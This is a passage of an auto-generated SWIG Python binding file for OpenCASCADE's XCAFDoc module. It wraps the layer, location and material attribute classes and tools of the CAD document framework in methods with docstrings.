:type Index: int
:param S:
:type S: XCAFDoc_GraphNodeSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_InsertBefore(self, *args)
def InsertAfter(self, *args):
"""
:param Index:
:type Index: int
:param T:
:type T: Handle_XCAFDoc_GraphNode &
:rtype: None
:param Index:
:type Index: int
:param S:
:type S: XCAFDoc_GraphNodeSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_InsertAfter(self, *args)
def First(self, *args):
"""
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_First(self, *args)
def Last(self, *args):
"""
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Last(self, *args)
def Split(self, *args):
"""
:param Index:
:type Index: int
:param Sub:
:type Sub: XCAFDoc_GraphNodeSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Split(self, *args)
def Value(self, *args):
"""
:param Index:
:type Index: int
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Value(self, *args)
def SetValue(self, *args):
"""
:param Index:
:type Index: int
:param I:
:type I: Handle_XCAFDoc_GraphNode &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_SetValue(self, *args)
def ChangeValue(self, *args):
"""
:param Index:
:type Index: int
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_ChangeValue(self, *args)
def Remove(self, *args):
"""
:param Index:
:type Index: int
:rtype: None
:param FromIndex:
:type FromIndex: int
:param ToIndex:
:type ToIndex: int
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Remove(self, *args)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_GraphNodeSequence.Clear = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Clear,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Assign = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Assign,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Set = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Set,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Append = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Append,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Prepend = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Prepend,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.InsertBefore = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_InsertBefore,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.InsertAfter = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_InsertAfter,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.First = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_First,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Last = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Last,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Split = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Split,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Value = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Value,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.SetValue = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_SetValue,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.ChangeValue = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_ChangeValue,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Remove = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Remove,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence__kill_pointed,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence_swigregister = _XCAFDoc.XCAFDoc_GraphNodeSequence_swigregister
XCAFDoc_GraphNodeSequence_swigregister(XCAFDoc_GraphNodeSequence)
class XCAFDoc_LayerTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_LayerTool_swiginit(self,_XCAFDoc.new_XCAFDoc_LayerTool(*args))
def Set(*args):
"""
* Creates (if not exist) LayerTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_LayerTool
"""
return _XCAFDoc.XCAFDoc_LayerTool_Set(*args)
Set = staticmethod(Set)
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_LayerTool_GetID(*args)
GetID = staticmethod(GetID)
def BaseLabel(self, *args):
"""
* returns the label under which Layers are stored
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_LayerTool_BaseLabel(self, *args)
def ShapeTool(self, *args):
"""
* Returns internal XCAFDoc_ShapeTool tool
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_LayerTool_ShapeTool(self, *args)
def IsLayer(self, *args):
"""
* Returns True if label belongs to a Layertable and is a Layer definition
:param lab:
:type lab: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_LayerTool_IsLayer(self, *args)
def GetLayer(self, *args):
"""
* Returns Layer defined by label lab Returns False if the label is not in Layertable or does not define a Layer
:param lab:
:type lab: TDF_Label &
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_LayerTool_GetLayer(self, *args)
def FindLayer(self, *args):
"""
* Finds a Layer definition in a Layertable and returns its label if found Returns False if Layer is not found in Layertable
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:param lab:
:type lab: TDF_Label &
:rtype: bool
* Finds a Layer definition in a Layertable and returns its label if found (or Null label else)
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_LayerTool_FindLayer(self, *args)
def AddLayer(self, *args):
"""
* Adds a Layer definition to a Layertable and returns its label (returns existing label if the same Layer is already defined)
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_LayerTool_AddLayer(self, *args)
def RemoveLayer(self, *args):
"""
* Removes Layer from the Layertable
:param lab:
:type lab: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_LayerTool_RemoveLayer(self, *args)
def GetLayerLabels(self, *args):
"""
* Returns a sequence of Layers currently stored in the Layertable
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_LayerTool_GetLayerLabels(self, *args)
def GetShapesOfLayer(self, *args):
"""
* Return sequanese of shape labels that assigned with layers to <ShLabels>.
:param layerL:
:type layerL: TDF_Label &
:param ShLabels:
:type ShLabels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_LayerTool_GetShapesOfLayer(self, *args)
def IsVisible(self, *args):
"""
* Return True if layer is visible, False if invisible.
:param layerL:
:type layerL: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_LayerTool_IsVisible(self, *args)
def SetVisibility(self, *args):
"""
* Set the visibility of layer. If layer is invisible when on it's layer will set UAttribute with corresponding GUID.
:param layerL:
:type layerL: TDF_Label &
:param isvisible: default value is Standard_True
:type isvisible: bool
:rtype: None
"""
return _XCAFDoc.XCAFDoc_LayerTool_SetVisibility(self, *args)
def SetLayer(self, *args):
"""
* Sets a link from label <L> to Layer defined by <LayerL> optional parametr <shapeInOneLayer> show could shape be in number of layers or only in one.
:param L:
:type L: TDF_Label &
:param LayerL:
:type LayerL: TDF_Label &
:param shapeInOneLayer: default value is Standard_False
:type shapeInOneLayer: bool
:rtype: None
* Sets a link from label <L> to Layer <aLayer> in the Layertable Adds a Layer as necessary optional parametr <shapeInOneLayer> show could shape be in number of layers or only in one.
:param L:
:type L: TDF_Label &
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:param shapeInOneLayer: default value is Standard_False
:type shapeInOneLayer: bool
:rtype: None
* Sets a link from label that containig shape <Sh> with layer that situated at label <LayerL>. optional parametr <shapeInOneLayer> show could shape be in number of layers or only in one. return False if no such shape <Sh> or label <LayerL>
:param Sh:
:type Sh: TopoDS_Shape &
:param LayerL:
:type LayerL: TDF_Label &
:param shapeInOneLayer: default value is Standard_False
:type shapeInOneLayer: bool
:rtype: bool
* Sets a link from label that containig shape <Sh> with layer <aLayer>. Add <aLayer> to LayerTable if nessesery. optional parametr <shapeInOneLayer> show could shape be in number of layers or only in one. return False if no such shape <Sh>.
:param Sh:
:type Sh: TopoDS_Shape &
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:param shapeInOneLayer: default value is Standard_False
:type shapeInOneLayer: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_LayerTool_SetLayer(self, *args)
def UnSetLayers(self, *args):
"""
* Removes a link from label <L> to all layers
:param L:
:type L: TDF_Label &
:rtype: None
* Remove link between shape <Sh> and all Layers at LayerTable. return False if no such shape <Sh> in XCAF Document.
:param Sh:
:type Sh: TopoDS_Shape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_LayerTool_UnSetLayers(self, *args)
def UnSetOneLayer(self, *args):
"""
* Remove link from label <L> and Layer <aLayer>. returns False if no such layer.
:param L:
:type L: TDF_Label &
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:rtype: bool
* Remove link from label <L> and Layer <aLayerL>. returns False if <aLayerL> is not a layer label.
:param L:
:type L: TDF_Label &
:param aLayerL:
:type aLayerL: TDF_Label &
:rtype: bool
* Remove link between shape <Sh> and layer <aLayer>. returns False if no such layer <aLayer> or shape <Sh>.
:param Sh:
:type Sh: TopoDS_Shape &
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:rtype: bool
* Remove link between shape <Sh> and layer <aLayerL>. returns False if no such layer <aLayerL> or shape <Sh>.
:param Sh:
:type Sh: TopoDS_Shape &
:param aLayerL:
:type aLayerL: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_LayerTool_UnSetOneLayer(self, *args)
def IsSet(self, *args):
"""
* Returns True if label <L> has a Layer assosiated with the <aLayer>.
:param L:
:type L: TDF_Label &
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:rtype: bool
* Returns True if label <L> has a Layer assosiated with the <aLayerL> label.
:param L:
:type L: TDF_Label &
:param aLayerL:
:type aLayerL: TDF_Label &
:rtype: bool
* Returns True if shape <Sh> has a Layer assosiated with the <aLayer>.
:param Sh:
:type Sh: TopoDS_Shape &
:param aLayer:
:type aLayer: TCollection_ExtendedString &
:rtype: bool
* Returns True if shape <Sh> has a Layer assosiated with the <aLayerL>.
:param Sh:
:type Sh: TopoDS_Shape &
:param aLayerL:
:type aLayerL: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_LayerTool_IsSet(self, *args)
def GetLayers(self, *args):
"""
* Return sequence of strings <aLayerS> that assosiated with label <L>.
:param L:
:type L: TDF_Label &
:param aLayerS:
:type aLayerS: Handle_TColStd_HSequenceOfExtendedString &
:rtype: bool
* Return sequence of labels <aLayerSL> that assosiated with label <L>.
:param L:
:type L: TDF_Label &
:param aLayerLS:
:type aLayerLS: TDF_LabelSequence &
:rtype: bool
* Return sequence of strings that assosiated with label <L>.
:param L:
:type L: TDF_Label &
:rtype: Handle_TColStd_HSequenceOfExtendedString
* Return sequence of strings <aLayerS> that assosiated with shape <Sh>.
:param Sh:
:type Sh: TopoDS_Shape &
:param aLayerS:
:type aLayerS: Handle_TColStd_HSequenceOfExtendedString &
:rtype: bool
* Return sequence of labels <aLayerLS> that assosiated with shape <Sh>.
:param Sh:
:type Sh: TopoDS_Shape &
:param aLayerLS:
:type aLayerLS: TDF_LabelSequence &
:rtype: bool
* Return sequence of strings that assosiated with shape <Sh>.
:param Sh:
:type Sh: TopoDS_Shape &
:rtype: Handle_TColStd_HSequenceOfExtendedString
"""
return _XCAFDoc.XCAFDoc_LayerTool_GetLayers(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_LayerTool self)"""
return _XCAFDoc.XCAFDoc_LayerTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_LayerTool self) -> Handle_XCAFDoc_LayerTool"""
return _XCAFDoc.XCAFDoc_LayerTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_LayerTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_BaseLabel,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_ShapeTool,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.IsLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_IsLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.FindLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_FindLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.AddLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_AddLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.RemoveLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_RemoveLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetLayerLabels = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetLayerLabels,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetShapesOfLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetShapesOfLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.IsVisible = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_IsVisible,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.SetVisibility = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_SetVisibility,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.SetLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_SetLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.UnSetLayers = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_UnSetLayers,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.UnSetOneLayer = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_UnSetOneLayer,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.IsSet = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_IsSet,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetLayers = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetLayers,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool__kill_pointed,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_LayerTool_GetHandle,None,XCAFDoc_LayerTool)
XCAFDoc_LayerTool_swigregister = _XCAFDoc.XCAFDoc_LayerTool_swigregister
XCAFDoc_LayerTool_swigregister(XCAFDoc_LayerTool)
def XCAFDoc_LayerTool_Set(*args):
"""
* Creates (if not exist) LayerTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_LayerTool
"""
return _XCAFDoc.XCAFDoc_LayerTool_Set(*args)
def XCAFDoc_LayerTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_LayerTool_GetID(*args)
class Handle_XCAFDoc_LayerTool(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_LayerTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_LayerTool(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_LayerTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_Nullify,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_IsNull,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool_GetObject,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_LayerTool__kill_pointed,None,Handle_XCAFDoc_LayerTool)
Handle_XCAFDoc_LayerTool_swigregister = _XCAFDoc.Handle_XCAFDoc_LayerTool_swigregister
Handle_XCAFDoc_LayerTool_swigregister(Handle_XCAFDoc_LayerTool)
def Handle_XCAFDoc_LayerTool_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_LayerTool_DownCast(*args)
Handle_XCAFDoc_LayerTool_DownCast = _XCAFDoc.Handle_XCAFDoc_LayerTool_DownCast
class XCAFDoc_Location(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
* class methods =============
:rtype: None
"""
_XCAFDoc.XCAFDoc_Location_swiginit(self,_XCAFDoc.new_XCAFDoc_Location(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Location_GetID(*args)
GetID = staticmethod(GetID)
def Set(self, *args):
"""
* Find, or create, a Location attribute and set it's value the Location attribute is returned. Location methods ===============
:param label:
:type label: TDF_Label &
:param Loc:
:type Loc: TopLoc_Location &
:rtype: Handle_XCAFDoc_Location
:param Loc:
:type Loc: TopLoc_Location &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_Location_Set(self, *args)
def Get(self, *args):
"""
* Returns True if there is a reference on the same label
:rtype: TopLoc_Location
"""
return _XCAFDoc.XCAFDoc_Location_Get(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_Location self)"""
return _XCAFDoc.XCAFDoc_Location__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_Location self) -> Handle_XCAFDoc_Location"""
return _XCAFDoc.XCAFDoc_Location_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_Location.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Location_Set,None,XCAFDoc_Location)
XCAFDoc_Location.Get = new_instancemethod(_XCAFDoc.XCAFDoc_Location_Get,None,XCAFDoc_Location)
XCAFDoc_Location._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Location__kill_pointed,None,XCAFDoc_Location)
XCAFDoc_Location.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Location_GetHandle,None,XCAFDoc_Location)
XCAFDoc_Location_swigregister = _XCAFDoc.XCAFDoc_Location_swigregister
XCAFDoc_Location_swigregister(XCAFDoc_Location)
def XCAFDoc_Location_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Location_GetID(*args)
class Handle_XCAFDoc_Location(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_Location_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Location(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Location_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_Location.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location_Nullify,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location_IsNull,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location_GetObject,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Location__kill_pointed,None,Handle_XCAFDoc_Location)
Handle_XCAFDoc_Location_swigregister = _XCAFDoc.Handle_XCAFDoc_Location_swigregister
Handle_XCAFDoc_Location_swigregister(Handle_XCAFDoc_Location)
def Handle_XCAFDoc_Location_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_Location_DownCast(*args)
Handle_XCAFDoc_Location_DownCast = _XCAFDoc.Handle_XCAFDoc_Location_DownCast
class XCAFDoc_Material(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_Material_swiginit(self,_XCAFDoc.new_XCAFDoc_Material(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Material_GetID(*args)
GetID = staticmethod(GetID)
def Set(self, *args):
"""
:param label:
:type label: TDF_Label &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param aDensity:
:type aDensity: float
:param aDensName:
:type aDensName: Handle_TCollection_HAsciiString &
:param aDensValType:
:type aDensValType: Handle_TCollection_HAsciiString &
:rtype: Handle_XCAFDoc_Material
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param aDensity:
:type aDensity: float
:param aDensName:
:type aDensName: Handle_TCollection_HAsciiString &
:param aDensValType:
:type aDensValType: Handle_TCollection_HAsciiString &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_Material_Set(self, *args)
def GetName(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_Material_GetName(self, *args)
def GetDescription(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_Material_GetDescription(self, *args)
def GetDensity(self, *args):
"""
:rtype: float
"""
return _XCAFDoc.XCAFDoc_Material_GetDensity(self, *args)
def GetDensName(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_Material_GetDensName(self, *args)
def GetDensValType(self, *args):
"""
:rtype: Handle_TCollection_HAsciiString
"""
return _XCAFDoc.XCAFDoc_Material_GetDensValType(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_Material self)"""
return _XCAFDoc.XCAFDoc_Material__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_Material self) -> Handle_XCAFDoc_Material"""
return _XCAFDoc.XCAFDoc_Material_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_Material.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Material_Set,None,XCAFDoc_Material)
XCAFDoc_Material.GetName = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetName,None,XCAFDoc_Material)
XCAFDoc_Material.GetDescription = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDescription,None,XCAFDoc_Material)
XCAFDoc_Material.GetDensity = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDensity,None,XCAFDoc_Material)
XCAFDoc_Material.GetDensName = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDensName,None,XCAFDoc_Material)
XCAFDoc_Material.GetDensValType = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetDensValType,None,XCAFDoc_Material)
XCAFDoc_Material._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Material__kill_pointed,None,XCAFDoc_Material)
XCAFDoc_Material.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Material_GetHandle,None,XCAFDoc_Material)
XCAFDoc_Material_swigregister = _XCAFDoc.XCAFDoc_Material_swigregister
XCAFDoc_Material_swigregister(XCAFDoc_Material)
def XCAFDoc_Material_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Material_GetID(*args)
class Handle_XCAFDoc_Material(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_Material_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Material(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Material_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_Material.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material_Nullify,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material_IsNull,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material_GetObject,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Material__kill_pointed,None,Handle_XCAFDoc_Material)
Handle_XCAFDoc_Material_swigregister = _XCAFDoc.Handle_XCAFDoc_Material_swigregister
Handle_XCAFDoc_Material_swigregister(Handle_XCAFDoc_Material)
def Handle_XCAFDoc_Material_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_Material_DownCast(*args)
Handle_XCAFDoc_Material_DownCast = _XCAFDoc.Handle_XCAFDoc_Material_DownCast
class XCAFDoc_MaterialTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_MaterialTool_swiginit(self,_XCAFDoc.new_XCAFDoc_MaterialTool(*args))
def Set(*args):
"""
* Creates (if not exist) MaterialTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_MaterialTool
"""
return _XCAFDoc.XCAFDoc_MaterialTool_Set(*args)
Set = staticmethod(Set)
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_MaterialTool_GetID(*args)
GetID = staticmethod(GetID)
def BaseLabel(self, *args):
"""
* returns the label under which colors are stored
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_MaterialTool_BaseLabel(self, *args)
def ShapeTool(self, *args):
"""
* Returns internal XCAFDoc_ShapeTool tool
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_MaterialTool_ShapeTool(self, *args)
def IsMaterial(self, *args):
"""
* Returns True if label belongs to a material table and is a Material definition
:param lab:
:type lab: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_MaterialTool_IsMaterial(self, *args)
def GetMaterialLabels(self, *args):
"""
* Returns a sequence of materials currently stored in the material table
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_MaterialTool_GetMaterialLabels(self, *args)
def AddMaterial(self, *args):
"""
* Adds a Material definition to a table and returns its label
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param aDensity:
:type aDensity: float
:param aDensName:
:type aDensName: Handle_TCollection_HAsciiString &
:param aDensValType:
:type aDensValType: Handle_TCollection_HAsciiString &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_MaterialTool_AddMaterial(self, *args)
def SetMaterial(self, *args):
"""
* Sets a link with GUID
:param L:
:type L: TDF_Label &
:param MatL:
:type MatL: TDF_Label &
:rtype: None
* Sets a link with GUID Adds a Material as necessary
:param L:
:type L: TDF_Label &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param aDensity:
:type aDensity: float
:param aDensName:
:type aDensName: Handle_TCollection_HAsciiString &
:param aDensValType:
:type aDensValType: Handle_TCollection_HAsciiString &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_MaterialTool_SetMaterial(self, *args)
def GetMaterial(self, *args):
"""
* Returns Material assigned to <MatL> Returns False if no such Material is assigned
:param MatL:
:type MatL: TDF_Label &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param aDensity:
:type aDensity: float &
:param aDensName:
:type aDensName: Handle_TCollection_HAsciiString &
:param aDensValType:
:type aDensValType: Handle_TCollection_HAsciiString &
:rtype: bool
"""
